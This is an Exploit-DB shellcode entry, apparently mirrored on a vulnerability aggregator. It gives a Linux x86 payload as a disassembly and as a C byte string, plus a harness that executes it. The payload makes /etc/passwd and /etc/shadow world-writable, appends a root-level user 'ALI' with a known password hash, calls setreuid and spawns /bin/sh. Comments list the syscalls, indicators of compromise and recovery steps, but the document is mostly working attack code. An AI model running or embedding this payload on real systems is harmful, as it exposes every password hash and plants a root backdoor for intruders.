
Linux x86 - chmod 777 /etc/passwd & /etc/shadow, Add New Root User ALI/ALI & Execute /bin/sh

🗓️ 04 Aug 2014 00:00:00Reported by Ali RazmjooType 
exploitdb
 exploitdb
🔗 www.exploit-db.com👁 47 Views

Shellcode Linux x86 chmod(777 /etc/passwd and /etc/shadow) && Add new root user ALI/ALI && Execute /bin/sh

Code
/*# Exploit Title: Shellcode Linux x86 chmod(777 /etc/passwd and /etc/shadow) && (Add new root user [ALI] with password [ALI] for ssh) && Execute /bin/sh 
# Date: 4/8/2014
# Exploit Author: Ali Razmjoo
# Tested on: kali-linux-1.0.4-i386 [3.7-trunk-686-pae #1 SMP Debian 3.7.2-0+kali8 i686 GNU/Linux ]
*/
/*
Ali Razmjoo , [email protected]
Shellcode Linux x86 chmod(777 /etc/passwd and /etc/shadow) && (Add new root user [ALI] with password [ALI] for ssh) && Setreuid() , Execute /bin/sh 
length: 378 bytes
chmod('/etc/passwd',777)
chmod('/etc/shadow',777)
open passwd, and write a new root user with password (user: ALI, pass: ALI), close passwd
setreuid() , execve('/bin/sh')


00000000 <_start>:
   0:	31 c0                	xor    %eax,%eax
   2:	31 db                	xor    %ebx,%ebx
   4:	6a 0f                	push   $0xf
   6:	58                   	pop    %eax
   7:	68 6a 73 77 64       	push   $0x6477736a
   c:	5b                   	pop    %ebx
   d:	c1 eb 08             	shr    $0x8,%ebx
  10:	53                   	push   %ebx
  11:	68 2f 70 61 73       	push   $0x7361702f
  16:	68 2f 65 74 63       	push   $0x6374652f
  1b:	89 e3                	mov    %esp,%ebx
  1d:	68 41 41 ff 01       	push   $0x1ff4141
  22:	59                   	pop    %ecx
  23:	c1 e9 08             	shr    $0x8,%ecx
  26:	c1 e9 08             	shr    $0x8,%ecx
  29:	cd 80                	int    $0x80
  2b:	6a 0f                	push   $0xf
  2d:	58                   	pop    %eax
  2e:	68 6a 64 6f 77       	push   $0x776f646a
  33:	5b                   	pop    %ebx
  34:	c1 eb 08             	shr    $0x8,%ebx
  37:	53                   	push   %ebx
  38:	68 2f 73 68 61       	push   $0x6168732f
  3d:	68 2f 65 74 63       	push   $0x6374652f
  42:	89 e3                	mov    %esp,%ebx
  44:	68 41 41 ff 01       	push   $0x1ff4141
  49:	59                   	pop    %ecx
  4a:	c1 e9 08             	shr    $0x8,%ecx
  4d:	c1 e9 08             	shr    $0x8,%ecx
  50:	cd 80                	int    $0x80
  52:	6a 05                	push   $0x5
  54:	58                   	pop    %eax
  55:	68 41 73 77 64       	push   $0x64777341
  5a:	5b                   	pop    %ebx
  5b:	c1 eb 08             	shr    $0x8,%ebx
  5e:	53                   	push   %ebx
  5f:	68 2f 70 61 73       	push   $0x7361702f
  64:	68 2f 65 74 63       	push   $0x6374652f
  69:	89 e3                	mov    %esp,%ebx
  6b:	68 41 41 01 04       	push   $0x4014141
  70:	59                   	pop    %ecx
  71:	c1 e9 08             	shr    $0x8,%ecx
  74:	c1 e9 08             	shr    $0x8,%ecx
  77:	cd 80                	int    $0x80
  79:	89 c3                	mov    %eax,%ebx
  7b:	6a 04                	push   $0x4
  7d:	58                   	pop    %eax
  7e:	68 41 73 68 0a       	push   $0xa687341
  83:	59                   	pop    %ecx
  84:	c1 e9 08             	shr    $0x8,%ecx
  87:	51                   	push   %ecx
  88:	68 6e 2f 62 61       	push   $0x61622f6e
  8d:	68 3a 2f 62 69       	push   $0x69622f3a
  92:	68 72 6f 6f 74       	push   $0x746f6f72
  97:	68 4c 49 3a 2f       	push   $0x2f3a494c
  9c:	68 3a 30 3a 41       	push   $0x413a303a
  a1:	68 4b 2e 3a 30       	push   $0x303a2e4b
  a6:	68 66 77 55 57       	push   $0x57557766
  ab:	68 68 70 31 50       	push   $0x50317068
  b0:	68 7a 59 65 41       	push   $0x4165597a
  b5:	68 41 61 41 51       	push   $0x51416141
  ba:	68 49 38 75 74       	push   $0x74753849
  bf:	68 50 4d 59 68       	push   $0x68594d50
  c4:	68 54 42 74 7a       	push   $0x7a744254
  c9:	68 51 2f 38 54       	push   $0x54382f51
  ce:	68 45 36 6d 67       	push   $0x676d3645
  d3:	68 76 50 2e 73       	push   $0x732e5076
  d8:	68 4e 58 52 37       	push   $0x3752584e
  dd:	68 39 4b 55 48       	push   $0x48554b39
  e2:	68 72 2f 59 42       	push   $0x42592f72
  e7:	68 56 78 4b 47       	push   $0x474b7856
  ec:	68 39 55 66 5a       	push   $0x5a665539
  f1:	68 46 56 6a 68       	push   $0x686a5646
  f6:	68 46 63 38 79       	push   $0x79386346
  fb:	68 70 59 6a 71       	push   $0x716a5970
 100:	68 77 69 53 68       	push   $0x68536977
 105:	68 6e 54 67 54       	push   $0x5467546e
 10a:	68 58 4d 69 37       	push   $0x37694d58
 10f:	68 2f 41 6e 24       	push   $0x246e412f
 114:	68 70 55 6e 4d       	push   $0x4d6e5570
 119:	68 24 36 24 6a       	push   $0x6a243624
 11e:	68 41 4c 49 3a       	push   $0x3a494c41
 123:	89 e1                	mov    %esp,%ecx
 125:	ba 41 41 41 7f       	mov    $0x7f414141,%edx
 12a:	c1 ea 08             	shr    $0x8,%edx
 12d:	c1 ea 08             	shr    $0x8,%edx
 130:	c1 ea 08             	shr    $0x8,%edx
 133:	cd 80                	int    $0x80
 135:	31 c0                	xor    %eax,%eax
 137:	b0 46                	mov    $0x46,%al
 139:	31 db                	xor    %ebx,%ebx
 13b:	31 c9                	xor    %ecx,%ecx
 13d:	cd 80                	int    $0x80
 13f:	31 c0                	xor    %eax,%eax
 141:	b0 46                	mov    $0x46,%al
 143:	31 db                	xor    %ebx,%ebx
 145:	31 c9                	xor    %ecx,%ecx
 147:	cd 80                	int    $0x80
 149:	68 59 59 59 59       	push   $0x59595959
 14e:	68 58 58 58 58       	push   $0x58585858
 153:	68 2f 73 68 42       	push   $0x4268732f
 158:	68 2f 62 69 6e       	push   $0x6e69622f
 15d:	89 e3                	mov    %esp,%ebx
 15f:	31 c0                	xor    %eax,%eax
 161:	88 43 07             	mov    %al,0x7(%ebx)
 164:	89 5b 08             	mov    %ebx,0x8(%ebx)
 167:	89 43 0c             	mov    %eax,0xc(%ebx)
 16a:	b0 0b                	mov    $0xb,%al
 16c:	8d 4b 08             	lea    0x8(%ebx),%ecx
 16f:	8d 53 0c             	lea    0xc(%ebx),%edx
 172:	cd 80                	int    $0x80
 174:	b0 01                	mov    $0x1,%al
 176:	b3 01                	mov    $0x1,%bl
 178:	cd 80                	int    $0x80

*/

#include <stdio.h>
#include <string.h>
/*
 * sc: the 378-byte i386 Linux payload whose disassembly is given in the
 * header comment, stored as a C string. No \x00 byte appears in the literal,
 * so strlen(sc) in main() reports the whole payload.
 *
 * Syscall sequence visible in that listing (int $0x80, number in %eax):
 *   15  chmod("/etc/passwd", 0777)
 *   15  chmod("/etc/shadow", 0777)
 *    5  open("/etc/passwd", 0x401)  -- O_WRONLY|O_APPEND on Linux
 *    4  write(fd, buf, 127)         -- one passwd line for user "ALI" with
 *                                      uid 0 / gid 0 and a $6$ crypt hash in
 *                                      the password field
 *   70  setreuid(0, 0), issued twice
 *   11  execve("/bin/sh")
 *    1  exit, reached only if execve returns
 * The header comment mentions closing passwd, but the listing contains no
 * close syscall (number 6).
 *
 * Host-side indicators that follow from the sequence: /etc/passwd or
 * /etc/shadow becoming world-writable, a second uid-0 line in /etc/passwd,
 * and a hash stored in the passwd password field instead of "x".
 * File-integrity monitoring or audit watches on both files cover all three.
 * Because shadow is world-readable from the moment the second chmod lands,
 * recovery has to treat every existing password hash as exposed, not only
 * remove the added line and restore the modes.
 */
char sc[] = "\x31\xc0\x31\xdb\x6a\x0f\x58\x68\x6a\x73\x77\x64\x5b\xc1\xeb\x08\x53\x68\x2f\x70\x61\x73\x68\x2f\x65\x74\x63\x89\xe3\x68\x41\x41\xff\x01\x59\xc1\xe9\x08\xc1\xe9\x08\xcd\x80\x6a\x0f\x58\x68\x6a\x64\x6f\x77\x5b\xc1\xeb\x08\x53\x68\x2f\x73\x68\x61\x68\x2f\x65\x74\x63\x89\xe3\x68\x41\x41\xff\x01\x59\xc1\xe9\x08\xc1\xe9\x08\xcd\x80\x6a\x05\x58\x68\x41\x73\x77\x64\x5b\xc1\xeb\x08\x53\x68\x2f\x70\x61\x73\x68\x2f\x65\x74\x63\x89\xe3\x68\x41\x41\x01\x04\x59\xc1\xe9\x08\xc1\xe9\x08\xcd\x80\x89\xc3\x6a\x04\x58\x68\x41\x73\x68\x0a\x59\xc1\xe9\x08\x51\x68\x6e\x2f\x62\x61\x68\x3a\x2f\x62\x69\x68\x72\x6f\x6f\x74\x68\x4c\x49\x3a\x2f\x68\x3a\x30\x3a\x41\x68\x4b\x2e\x3a\x30\x68\x66\x77\x55\x57\x68\x68\x70\x31\x50\x68\x7a\x59\x65\x41\x68\x41\x61\x41\x51\x68\x49\x38\x75\x74\x68\x50\x4d\x59\x68\x68\x54\x42\x74\x7a\x68\x51\x2f\x38\x54\x68\x45\x36\x6d\x67\x68\x76\x50\x2e\x73\x68\x4e\x58\x52\x37\x68\x39\x4b\x55\x48\x68\x72\x2f\x59\x42\x68\x56\x78\x4b\x47\x68\x39\x55\x66\x5a\x68\x46\x56\x6a\x68\x68\x46\x63\x38\x79\x68\x70\x59\x6a\x71\x68\x77\x69\x53\x68\x68\x6e\x54\x67\x54\x68\x58\x4d\x69\x37\x68\x2f\x41\x6e\x24\x68\x70\x55\x6e\x4d\x68\x24\x36\x24\x6a\x68\x41\x4c\x49\x3a\x89\xe1\xba\x41\x41\x41\x7f\xc1\xea\x08\xc1\xea\x08\xc1\xea\x08\xcd\x80\x31\xc0\xb0\x46\x31\xdb\x31\xc9\xcd\x80\x31\xc0\xb0\x46\x31\xdb\x31\xc9\xcd\x80\x68\x59\x59\x59\x59\x68\x58\x58\x58\x58\x68\x2f\x73\x68\x42\x68\x2f\x62\x69\x6e\x89\xe3\x31\xc0\x88\x43\x07\x89\x5b\x08\x89\x43\x0c\xb0\x0b\x8d\x4b\x08\x8d\x53\x0c\xcd\x80\xb0\x01\xb3\x01\xcd\x80";
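/*
 * Test harness: prints the payload length, then calls the bytes in sc as if
 * they were a function. Takes no arguments. If the payload's final execve
 * succeeds, control never comes back to this function.
 */
int main(void)
{

    /* strlen() returns size_t, so the conversion must be %zu; %d is
     * undefined behaviour where size_t and int differ in width. */
    fprintf(stdout,"Length: %zu\n\n",strlen(sc));

    /* Casts the data array to a function pointer and calls it. sc is an
     * ordinary writable object, so where data pages are mapped
     * non-executable this call faults before any payload instruction runs. */
    (*(void(*)()) sc)();

}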

04 Aug 2014 00:00Current
0.2Low risk
Vulners AI Score0.2
47